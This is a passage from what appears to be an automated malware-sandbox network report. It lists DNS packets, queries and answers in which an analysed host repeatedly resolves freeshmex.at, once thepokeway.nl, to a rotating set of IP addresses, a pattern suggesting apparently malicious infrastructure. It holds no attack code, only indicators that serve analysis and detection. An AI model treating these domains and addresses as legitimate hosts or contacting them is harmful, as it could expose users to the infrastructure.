                                                        Nov 20, 2022 23:29:12.507647038 CET53611248.8.8.8192.168.2.4
                                                        Nov 20, 2022 23:29:13.444181919 CET5944453192.168.2.48.8.8.8
                                                        Nov 20, 2022 23:29:13.462070942 CET53594448.8.8.8192.168.2.4
                                                        Nov 20, 2022 23:29:14.555423021 CET5557053192.168.2.48.8.8.8
                                                        Nov 20, 2022 23:29:14.572680950 CET53555708.8.8.8192.168.2.4
                                                        Nov 20, 2022 23:29:15.197158098 CET6490653192.168.2.48.8.8.8
                                                        Nov 20, 2022 23:29:15.216228962 CET53649068.8.8.8192.168.2.4
                                                        Nov 20, 2022 23:29:16.323513031 CET5944653192.168.2.48.8.8.8
                                                        Nov 20, 2022 23:29:16.590872049 CET53594468.8.8.8192.168.2.4
                                                        Nov 20, 2022 23:29:17.602653980 CET5086153192.168.2.48.8.8.8
                                                        Nov 20, 2022 23:29:17.619864941 CET53508618.8.8.8192.168.2.4
                                                        Nov 20, 2022 23:29:18.740777016 CET6108853192.168.2.48.8.8.8
                                                        Nov 20, 2022 23:29:18.759512901 CET53610888.8.8.8192.168.2.4
                                                        Nov 20, 2022 23:29:19.297261000 CET5872953192.168.2.48.8.8.8
                                                        Nov 20, 2022 23:29:19.315705061 CET53587298.8.8.8192.168.2.4
                                                        Nov 20, 2022 23:29:20.771095991 CET6470053192.168.2.48.8.8.8
                                                        Nov 20, 2022 23:29:20.788518906 CET53647008.8.8.8192.168.2.4
                                                        Nov 20, 2022 23:29:21.948065042 CET5602253192.168.2.48.8.8.8
                                                        Nov 20, 2022 23:29:21.983481884 CET53560228.8.8.8192.168.2.4
                                                        Nov 20, 2022 23:29:23.214413881 CET6082253192.168.2.48.8.8.8
                                                        Nov 20, 2022 23:29:23.232932091 CET53608228.8.8.8192.168.2.4
                                                        Nov 20, 2022 23:29:23.827181101 CET4975053192.168.2.48.8.8.8
                                                        Nov 20, 2022 23:29:23.846496105 CET53497508.8.8.8192.168.2.4
                                                        Nov 20, 2022 23:29:25.362310886 CET6055053192.168.2.48.8.8.8
                                                        Nov 20, 2022 23:29:25.381015062 CET53605508.8.8.8192.168.2.4
                                                        Nov 20, 2022 23:29:26.486635923 CET5485153192.168.2.48.8.8.8
                                                        Nov 20, 2022 23:29:26.503977060 CET53548518.8.8.8192.168.2.4
                                                        Nov 20, 2022 23:29:27.071779966 CET5730053192.168.2.48.8.8.8
                                                        Nov 20, 2022 23:29:27.088516951 CET53573008.8.8.8192.168.2.4
                                                        Nov 20, 2022 23:29:28.583153963 CET5452153192.168.2.48.8.8.8
                                                        Nov 20, 2022 23:29:28.600070000 CET53545218.8.8.8192.168.2.4
                                                        Nov 20, 2022 23:29:29.106695890 CET5891453192.168.2.48.8.8.8
                                                        Nov 20, 2022 23:29:29.125757933 CET53589148.8.8.8192.168.2.4
                                                        Nov 20, 2022 23:29:30.912628889 CET5141953192.168.2.48.8.8.8
                                                        Nov 20, 2022 23:29:30.931942940 CET53514198.8.8.8192.168.2.4
                                                        Nov 20, 2022 23:29:33.042298079 CET5105453192.168.2.48.8.8.8
                                                        Nov 20, 2022 23:29:33.061590910 CET53510548.8.8.8192.168.2.4
                                                        Nov 20, 2022 23:29:34.309042931 CET5567353192.168.2.48.8.8.8
                                                        Nov 20, 2022 23:29:34.328246117 CET53556738.8.8.8192.168.2.4
                                                        Nov 20, 2022 23:29:35.856019020 CET4973553192.168.2.48.8.8.8
                                                        Nov 20, 2022 23:29:35.875257015 CET53497358.8.8.8192.168.2.4
                                                        Nov 20, 2022 23:29:37.259746075 CET5243753192.168.2.48.8.8.8
                                                        Nov 20, 2022 23:29:37.278784037 CET53524378.8.8.8192.168.2.4
                                                        Nov 20, 2022 23:29:38.748775959 CET5282553192.168.2.48.8.8.8
                                                        Nov 20, 2022 23:29:38.767709970 CET53528258.8.8.8192.168.2.4
                                                        Nov 20, 2022 23:29:39.740029097 CET5853053192.168.2.48.8.8.8
                                                        Nov 20, 2022 23:29:39.758965015 CET53585308.8.8.8192.168.2.4
                                                        Nov 20, 2022 23:29:40.848684072 CET6495953192.168.2.48.8.8.8
                                                        Nov 20, 2022 23:29:41.305578947 CET53649598.8.8.8192.168.2.4
                                                        Nov 20, 2022 23:29:42.670125008 CET6309353192.168.2.48.8.8.8
                                                        Nov 20, 2022 23:29:42.687516928 CET53630938.8.8.8192.168.2.4
                                                        Nov 20, 2022 23:29:44.191850901 CET5043353192.168.2.48.8.8.8
                                                        Nov 20, 2022 23:29:44.211040020 CET53504338.8.8.8192.168.2.4

                                                        DNS Queries

                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Nov 20, 2022 23:28:58.315989017 CET192.168.2.48.8.8.80x469eStandard query (0)freeshmex.atA (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:28:58.910177946 CET192.168.2.48.8.8.80x249cStandard query (0)freeshmex.atA (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:00.610528946 CET192.168.2.48.8.8.80xc120Standard query (0)freeshmex.atA (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:02.125159025 CET192.168.2.48.8.8.80xc05bStandard query (0)freeshmex.atA (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:03.178744078 CET192.168.2.48.8.8.80x86d0Standard query (0)freeshmex.atA (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:08.133244038 CET192.168.2.48.8.8.80x79e7Standard query (0)freeshmex.atA (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:09.308387041 CET192.168.2.48.8.8.80x1a0aStandard query (0)freeshmex.atA (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:11.139056921 CET192.168.2.48.8.8.80x8882Standard query (0)freeshmex.atA (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:12.490691900 CET192.168.2.48.8.8.80x6619Standard query (0)freeshmex.atA (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:13.444181919 CET192.168.2.48.8.8.80xdd43Standard query (0)freeshmex.atA (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:14.555423021 CET192.168.2.48.8.8.80x316eStandard query (0)freeshmex.atA (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:15.197158098 CET192.168.2.48.8.8.80xa0b7Standard query (0)freeshmex.atA (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:16.323513031 CET192.168.2.48.8.8.80x5769Standard query (0)freeshmex.atA (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:17.602653980 CET192.168.2.48.8.8.80x76a4Standard query (0)freeshmex.atA (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:18.740777016 CET192.168.2.48.8.8.80xf865Standard query (0)freeshmex.atA (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:19.297261000 CET192.168.2.48.8.8.80xc04aStandard query (0)freeshmex.atA (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:20.771095991 CET192.168.2.48.8.8.80xc176Standard query (0)freeshmex.atA (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:21.948065042 CET192.168.2.48.8.8.80xa74fStandard query (0)thepokeway.nlA (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:23.214413881 CET192.168.2.48.8.8.80xb74aStandard query (0)freeshmex.atA (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:23.827181101 CET192.168.2.48.8.8.80x9c9aStandard query (0)freeshmex.atA (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:25.362310886 CET192.168.2.48.8.8.80x1b54Standard query (0)freeshmex.atA (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:26.486635923 CET192.168.2.48.8.8.80x222bStandard query (0)freeshmex.atA (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:27.071779966 CET192.168.2.48.8.8.80xcfb4Standard query (0)freeshmex.atA (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:28.583153963 CET192.168.2.48.8.8.80x105Standard query (0)freeshmex.atA (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:29.106695890 CET192.168.2.48.8.8.80xb08Standard query (0)freeshmex.atA (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:30.912628889 CET192.168.2.48.8.8.80x50cdStandard query (0)freeshmex.atA (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:33.042298079 CET192.168.2.48.8.8.80x8d63Standard query (0)freeshmex.atA (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:34.309042931 CET192.168.2.48.8.8.80x30aaStandard query (0)freeshmex.atA (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:35.856019020 CET192.168.2.48.8.8.80xb35eStandard query (0)freeshmex.atA (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:37.259746075 CET192.168.2.48.8.8.80xcac2Standard query (0)freeshmex.atA (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:38.748775959 CET192.168.2.48.8.8.80x4809Standard query (0)freeshmex.atA (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:39.740029097 CET192.168.2.48.8.8.80x2527Standard query (0)freeshmex.atA (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:40.848684072 CET192.168.2.48.8.8.80x89f0Standard query (0)freeshmex.atA (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:42.670125008 CET192.168.2.48.8.8.80xe9d7Standard query (0)freeshmex.atA (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:44.191850901 CET192.168.2.48.8.8.80xb599Standard query (0)freeshmex.atA (IP address)IN (0x0001)false

                                                        DNS Answers

                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Nov 20, 2022 23:28:58.335184097 CET8.8.8.8192.168.2.40x469eNo error (0)freeshmex.at41.41.255.235A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:28:58.335184097 CET8.8.8.8192.168.2.40x469eNo error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:28:58.335184097 CET8.8.8.8192.168.2.40x469eNo error (0)freeshmex.at138.36.3.134A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:28:58.335184097 CET8.8.8.8192.168.2.40x469eNo error (0)freeshmex.at190.117.75.91A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:28:58.335184097 CET8.8.8.8192.168.2.40x469eNo error (0)freeshmex.at200.46.66.71A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:28:58.335184097 CET8.8.8.8192.168.2.40x469eNo error (0)freeshmex.at222.236.49.123A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:28:58.335184097 CET8.8.8.8192.168.2.40x469eNo error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:28:58.335184097 CET8.8.8.8192.168.2.40x469eNo error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:28:58.335184097 CET8.8.8.8192.168.2.40x469eNo error (0)freeshmex.at123.140.161.243A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:28:58.335184097 CET8.8.8.8192.168.2.40x469eNo error (0)freeshmex.at175.126.109.15A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:28:59.136641026 CET8.8.8.8192.168.2.40x249cNo error (0)freeshmex.at175.119.10.231A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:28:59.136641026 CET8.8.8.8192.168.2.40x249cNo error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:28:59.136641026 CET8.8.8.8192.168.2.40x249cNo error (0)freeshmex.at138.36.3.134A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:28:59.136641026 CET8.8.8.8192.168.2.40x249cNo error (0)freeshmex.at41.41.255.235A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:28:59.136641026 CET8.8.8.8192.168.2.40x249cNo error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:28:59.136641026 CET8.8.8.8192.168.2.40x249cNo error (0)freeshmex.at210.182.29.70A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:28:59.136641026 CET8.8.8.8192.168.2.40x249cNo error (0)freeshmex.at189.143.170.105A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:28:59.136641026 CET8.8.8.8192.168.2.40x249cNo error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:28:59.136641026 CET8.8.8.8192.168.2.40x249cNo error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:28:59.136641026 CET8.8.8.8192.168.2.40x249cNo error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:00.628477097 CET8.8.8.8192.168.2.40xc120No error (0)freeshmex.at222.236.49.123A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:00.628477097 CET8.8.8.8192.168.2.40xc120No error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:00.628477097 CET8.8.8.8192.168.2.40xc120No error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:00.628477097 CET8.8.8.8192.168.2.40xc120No error (0)freeshmex.at123.140.161.243A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:00.628477097 CET8.8.8.8192.168.2.40xc120No error (0)freeshmex.at175.126.109.15A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:00.628477097 CET8.8.8.8192.168.2.40xc120No error (0)freeshmex.at41.41.255.235A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:00.628477097 CET8.8.8.8192.168.2.40xc120No error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:00.628477097 CET8.8.8.8192.168.2.40xc120No error (0)freeshmex.at138.36.3.134A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:00.628477097 CET8.8.8.8192.168.2.40xc120No error (0)freeshmex.at190.117.75.91A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:00.628477097 CET8.8.8.8192.168.2.40xc120No error (0)freeshmex.at200.46.66.71A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:02.142298937 CET8.8.8.8192.168.2.40xc05bNo error (0)freeshmex.at41.41.255.235A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:02.142298937 CET8.8.8.8192.168.2.40xc05bNo error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:02.142298937 CET8.8.8.8192.168.2.40xc05bNo error (0)freeshmex.at138.36.3.134A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:02.142298937 CET8.8.8.8192.168.2.40xc05bNo error (0)freeshmex.at190.117.75.91A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:02.142298937 CET8.8.8.8192.168.2.40xc05bNo error (0)freeshmex.at200.46.66.71A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:02.142298937 CET8.8.8.8192.168.2.40xc05bNo error (0)freeshmex.at222.236.49.123A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:02.142298937 CET8.8.8.8192.168.2.40xc05bNo error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:02.142298937 CET8.8.8.8192.168.2.40xc05bNo error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:02.142298937 CET8.8.8.8192.168.2.40xc05bNo error (0)freeshmex.at123.140.161.243A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:02.142298937 CET8.8.8.8192.168.2.40xc05bNo error (0)freeshmex.at175.126.109.15A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:03.197679043 CET8.8.8.8192.168.2.40x86d0No error (0)freeshmex.at41.41.255.235A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:03.197679043 CET8.8.8.8192.168.2.40x86d0No error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:03.197679043 CET8.8.8.8192.168.2.40x86d0No error (0)freeshmex.at138.36.3.134A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:03.197679043 CET8.8.8.8192.168.2.40x86d0No error (0)freeshmex.at190.117.75.91A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:03.197679043 CET8.8.8.8192.168.2.40x86d0No error (0)freeshmex.at200.46.66.71A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:03.197679043 CET8.8.8.8192.168.2.40x86d0No error (0)freeshmex.at222.236.49.123A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:03.197679043 CET8.8.8.8192.168.2.40x86d0No error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:03.197679043 CET8.8.8.8192.168.2.40x86d0No error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:03.197679043 CET8.8.8.8192.168.2.40x86d0No error (0)freeshmex.at123.140.161.243A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:03.197679043 CET8.8.8.8192.168.2.40x86d0No error (0)freeshmex.at175.126.109.15A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:08.150207996 CET8.8.8.8192.168.2.40x79e7No error (0)freeshmex.at138.36.3.134A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:08.150207996 CET8.8.8.8192.168.2.40x79e7No error (0)freeshmex.at190.117.75.91A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:08.150207996 CET8.8.8.8192.168.2.40x79e7No error (0)freeshmex.at200.46.66.71A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:08.150207996 CET8.8.8.8192.168.2.40x79e7No error (0)freeshmex.at222.236.49.123A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:08.150207996 CET8.8.8.8192.168.2.40x79e7No error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:08.150207996 CET8.8.8.8192.168.2.40x79e7No error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:08.150207996 CET8.8.8.8192.168.2.40x79e7No error (0)freeshmex.at123.140.161.243A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:08.150207996 CET8.8.8.8192.168.2.40x79e7No error (0)freeshmex.at175.126.109.15A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:08.150207996 CET8.8.8.8192.168.2.40x79e7No error (0)freeshmex.at41.41.255.235A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:08.150207996 CET8.8.8.8192.168.2.40x79e7No error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:09.759661913 CET8.8.8.8192.168.2.40x1a0aNo error (0)freeshmex.at210.182.29.70A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:09.759661913 CET8.8.8.8192.168.2.40x1a0aNo error (0)freeshmex.at189.143.170.105A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:09.759661913 CET8.8.8.8192.168.2.40x1a0aNo error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:09.759661913 CET8.8.8.8192.168.2.40x1a0aNo error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:09.759661913 CET8.8.8.8192.168.2.40x1a0aNo error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:09.759661913 CET8.8.8.8192.168.2.40x1a0aNo error (0)freeshmex.at175.119.10.231A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:09.759661913 CET8.8.8.8192.168.2.40x1a0aNo error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:09.759661913 CET8.8.8.8192.168.2.40x1a0aNo error (0)freeshmex.at138.36.3.134A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:09.759661913 CET8.8.8.8192.168.2.40x1a0aNo error (0)freeshmex.at41.41.255.235A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:09.759661913 CET8.8.8.8192.168.2.40x1a0aNo error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:11.402641058 CET8.8.8.8192.168.2.40x8882No error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:11.402641058 CET8.8.8.8192.168.2.40x8882No error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:11.402641058 CET8.8.8.8192.168.2.40x8882No error (0)freeshmex.at175.119.10.231A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:11.402641058 CET8.8.8.8192.168.2.40x8882No error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:11.402641058 CET8.8.8.8192.168.2.40x8882No error (0)freeshmex.at138.36.3.134A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:11.402641058 CET8.8.8.8192.168.2.40x8882No error (0)freeshmex.at41.41.255.235A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:11.402641058 CET8.8.8.8192.168.2.40x8882No error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:11.402641058 CET8.8.8.8192.168.2.40x8882No error (0)freeshmex.at210.182.29.70A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:11.402641058 CET8.8.8.8192.168.2.40x8882No error (0)freeshmex.at189.143.170.105A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:11.402641058 CET8.8.8.8192.168.2.40x8882No error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:12.507647038 CET8.8.8.8192.168.2.40x6619No error (0)freeshmex.at41.41.255.235A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:12.507647038 CET8.8.8.8192.168.2.40x6619No error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:12.507647038 CET8.8.8.8192.168.2.40x6619No error (0)freeshmex.at138.36.3.134A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:12.507647038 CET8.8.8.8192.168.2.40x6619No error (0)freeshmex.at190.117.75.91A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:12.507647038 CET8.8.8.8192.168.2.40x6619No error (0)freeshmex.at200.46.66.71A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:12.507647038 CET8.8.8.8192.168.2.40x6619No error (0)freeshmex.at222.236.49.123A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:12.507647038 CET8.8.8.8192.168.2.40x6619No error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:12.507647038 CET8.8.8.8192.168.2.40x6619No error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:12.507647038 CET8.8.8.8192.168.2.40x6619No error (0)freeshmex.at123.140.161.243A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:12.507647038 CET8.8.8.8192.168.2.40x6619No error (0)freeshmex.at175.126.109.15A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:13.462070942 CET8.8.8.8192.168.2.40xdd43No error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:13.462070942 CET8.8.8.8192.168.2.40xdd43No error (0)freeshmex.at138.36.3.134A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:13.462070942 CET8.8.8.8192.168.2.40xdd43No error (0)freeshmex.at190.117.75.91A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:13.462070942 CET8.8.8.8192.168.2.40xdd43No error (0)freeshmex.at200.46.66.71A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:13.462070942 CET8.8.8.8192.168.2.40xdd43No error (0)freeshmex.at222.236.49.123A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:13.462070942 CET8.8.8.8192.168.2.40xdd43No error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:13.462070942 CET8.8.8.8192.168.2.40xdd43No error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:13.462070942 CET8.8.8.8192.168.2.40xdd43No error (0)freeshmex.at123.140.161.243A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:13.462070942 CET8.8.8.8192.168.2.40xdd43No error (0)freeshmex.at175.126.109.15A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:13.462070942 CET8.8.8.8192.168.2.40xdd43No error (0)freeshmex.at41.41.255.235A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:14.572680950 CET8.8.8.8192.168.2.40x316eNo error (0)freeshmex.at41.41.255.235A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:14.572680950 CET8.8.8.8192.168.2.40x316eNo error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:14.572680950 CET8.8.8.8192.168.2.40x316eNo error (0)freeshmex.at138.36.3.134A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:14.572680950 CET8.8.8.8192.168.2.40x316eNo error (0)freeshmex.at190.117.75.91A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:14.572680950 CET8.8.8.8192.168.2.40x316eNo error (0)freeshmex.at200.46.66.71A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:14.572680950 CET8.8.8.8192.168.2.40x316eNo error (0)freeshmex.at222.236.49.123A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:14.572680950 CET8.8.8.8192.168.2.40x316eNo error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:14.572680950 CET8.8.8.8192.168.2.40x316eNo error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:14.572680950 CET8.8.8.8192.168.2.40x316eNo error (0)freeshmex.at123.140.161.243A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:14.572680950 CET8.8.8.8192.168.2.40x316eNo error (0)freeshmex.at175.126.109.15A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:15.216228962 CET8.8.8.8192.168.2.40xa0b7No error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:15.216228962 CET8.8.8.8192.168.2.40xa0b7No error (0)freeshmex.at138.36.3.134A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:15.216228962 CET8.8.8.8192.168.2.40xa0b7No error (0)freeshmex.at190.117.75.91A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:15.216228962 CET8.8.8.8192.168.2.40xa0b7No error (0)freeshmex.at200.46.66.71A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:15.216228962 CET8.8.8.8192.168.2.40xa0b7No error (0)freeshmex.at222.236.49.123A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:15.216228962 CET8.8.8.8192.168.2.40xa0b7No error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:15.216228962 CET8.8.8.8192.168.2.40xa0b7No error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:15.216228962 CET8.8.8.8192.168.2.40xa0b7No error (0)freeshmex.at123.140.161.243A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:15.216228962 CET8.8.8.8192.168.2.40xa0b7No error (0)freeshmex.at175.126.109.15A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:15.216228962 CET8.8.8.8192.168.2.40xa0b7No error (0)freeshmex.at41.41.255.235A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:16.590872049 CET8.8.8.8192.168.2.40x5769No error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:16.590872049 CET8.8.8.8192.168.2.40x5769No error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:16.590872049 CET8.8.8.8192.168.2.40x5769No error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:16.590872049 CET8.8.8.8192.168.2.40x5769No error (0)freeshmex.at175.119.10.231A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:16.590872049 CET8.8.8.8192.168.2.40x5769No error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:16.590872049 CET8.8.8.8192.168.2.40x5769No error (0)freeshmex.at138.36.3.134A (IP address)IN (0x0001)false
                                                        Nov 20, 2022 23:29:16.590872049 CET8.8.8.8192.168.2.40x5769No error (0)freeshmex.at41.41.255.235A (IP address)IN (0x0001)false
